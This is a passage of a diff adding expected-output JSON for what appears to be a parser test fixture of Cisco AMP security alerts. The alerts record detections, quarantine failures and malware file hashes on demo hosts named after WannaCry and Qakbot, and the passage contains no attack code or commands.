"cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419303565650558983", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 783000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303565650559000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 55136, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419303565650558982", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 727000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303565650559000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\Windows\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 56507, + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "process.name": "mssecsvc.exe", + "process.pid": 7144, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419303565650558981", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 721000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303565650559000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 58030, + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "process.name": "mssecsvc.exe", + "process.pid": 7144, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419303565650558980", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 646000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303565650559000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 59553, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419303565650558979", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 504000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303565650559000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 60814, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.24D004A104-95.SBX.TG", + "cisco.amp.detection_id": "6419303565650558978", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 426000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303565650559000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 62075, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 768, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.24D004A104-95.SBX.TG", + "cisco.amp.detection_id": "6419303565650558977", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 399000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303565650559000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 63680, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 768, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 199000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6412662859016176000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 65285, + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:31.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 856000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6412662854721208000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 66208, + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:30.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412662850426241035", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 233000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412662850426241000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 67131, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:30.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412662850426241034", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 218000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412662850426241000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 68332, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:30.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412662850426241033", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 218000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412662850426241000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 69533, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:30.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.D177E09A9A-95.SBX.TG", + "cisco.amp.detection_id": "6412662850426241035", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 218000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412662850426241000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "file.name": "el2j9fcqj.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\el2j9fcqj.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 70734, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:30.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.D177E09A9A-95.SBX.TG", + "cisco.amp.detection_id": "6412662850426241034", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 218000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412662850426241000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "file.name": "kepv86368.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 71990, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:30.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.D177E09A9A-95.SBX.TG", + "cisco.amp.detection_id": "6412662850426241033", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 218000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412662850426241000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "file.name": "uqlq0o884.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 73246, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T18:03:55.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419281601187807332", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 891000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419281601187807000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 74502, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T18:03:55.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.24D004A104-95.SBX.TG", + "cisco.amp.detection_id": "6419281601187807332", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 891000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419281601187807000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 75695, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": 